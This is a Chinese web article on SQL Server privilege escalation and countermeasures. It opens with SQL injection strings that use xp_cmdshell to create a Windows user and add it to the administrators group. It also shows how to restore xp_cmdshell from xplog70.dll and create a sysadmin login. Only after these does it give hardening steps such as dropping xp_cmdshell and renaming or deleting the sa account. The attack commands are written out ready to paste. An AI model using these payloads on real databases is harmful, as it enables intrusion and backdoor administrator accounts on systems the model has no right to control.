上一篇:限制 SQL Server指定主机连接 >>
SQL Server 提升权限相关命令及防范
;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup administrators name /add"--
程序代码开启cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok
恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok
否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:/winnt/system32/xplog70.dll'
堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshell"
dos:
dir c:/
dir d:/
dir e:/
net user tsinternetusers password /add
net localgroup administrators tsinternetusers /add
备份恢复ipsec
secedit /export /cfg c:/tmp.inf
echo sedenynetworklogonright =>>c:/tmp.inf
secedit /configure /db c:/windows/secedit.sdb /cfg c:/tmp.inf
sql:
exec master..sp_addlogin username,password
exec master..sp_addsrvrolemember username,sysadmin
sa帐号的改名和删除
首先打开sql中的企业管理器,接着在工具选项卡中选择sql server配置属性依次,点服务器设置,看到允许对系统目录直接进行修改前面的方框吗,点一下,好。
再打开查询分析器,登陆进去(呵呵,随便你用什么帐号进去,不过可一定要在master数据库中有db_owner的权限)输入
update sysxlogins set name='你要改成的名字' where sid=0x01
update sysxlogins set sid=0xe765555bd44f054f89cd0076a06ea823 where name='你要改成的名字'
ok,执行成功,好拉,转道企业管理器中刷新安全性中的登陆,看看,sa是不是变成xwq拉,呵呵,选中xwq点击右键,怎么样是不是出现拉删除的选项,呵呵,删除。看看sa是不是已经没有拉。
后记
直接在查询分析器里怎么删除sa
直接在查询分析器里怎么删除sa,做法和前面所说的差不多,只不过这次不是在企业管理器中做手脚拉,而是利用sql提供给我们功能强大的存储过程来完成这项任务。下面就是我所说的需要利用的存储过程sp_configure,sp_configure显示或更改当前服务器的全局配置设置。
它的语法:
sp_configure [ [ @configname = ] 'name' ]
[ , [ @configvalue = ] 'value' ]
实例:
sp_configure 'allow updates', 1
go
reconfigure with override
go
好拉,这样我们就可以更新系统表拉,接下来和前面的做法一样拉 update sysxlogins set name='你要改成的名字' where sid=0x01,然后再删除"你改名后的那个名字"
不过要注意在 sp_configure 上没有参数(或只有第一个参数)的执行许可权限默认授予所有用户。有两个参数的 sp_configure(用于更改配置选项)的执行许可权限默认授予 sysadmin 和 serveradmin 固定服务器角色。reconfigure 权限默认授予 sysadmin 固定服务器角色和 serveradmin 固定服务器角色,并且不能传输。还得在master中是db_owner。
()
下一篇:Windows中提高内存效能的方法 >>
相关文章:
- · 常见硬件不兼容的典型故障解决方案
- · SQL查询语句精华使用简要
- · 与"入侵者"交手:认识XP下的NetBEUI
- · DIY超频经典教程(基础)
- · CACA基础教程
- · 超级P2P搜索引擎让所有收费网站破产
- · 轻轻松松破解还原卡
- · VPN技术详解
- · 微软ping程序源代码完整版
- · 在xp和2003下察看端口对应的进程
- · 关于BBSxp/LeadBBS的后台上传Webshell的鸡肋防范
- · 某运营商受DDOS攻击的应急响应内部文档
- · 利用FTP,实现Linux与windows文件互传
- · ADSL断流/断线问题集中分析
- · Win XP系统中网桥的配置方法
- · 网络基础:带你彻底认识路由器
- · 如何用FTP自动传送文件
- · 用Java获得IP地址
- · 一组SQLServer身份验证管理子程序
- · JavaScript与Java的区别
- · 按下某组键(HotKey)便执行某程式
- · 利用SQLEXEC突破网络妙管免费上网
- · webshell下的一次得到终端账号和密码的尝试
- · 通过试验探索 Access 2000/XP 数据库的最佳 NTFS 权限设置
- · 简单更改W2K的Telnet端口
- · 电子邮件头解析
- · VMware还是微软?虚拟机的选择权就在你手中
- · asp中获取安全的参数
- · Google还可以这样用
- · Smail堆溢出漏洞允许远程攻击者获得Root权限
- · Linux下软件的安装与卸载
- · 学习设置端口映射
- · 收藏经典:windows消息大全
- · 一行代码崩溃IE
- · 脚本安全和利用
- · 亲手打造一个QQ恶作剧程序
- · CCIE:年薪翻了两倍
- · Linux认证基本知识介绍
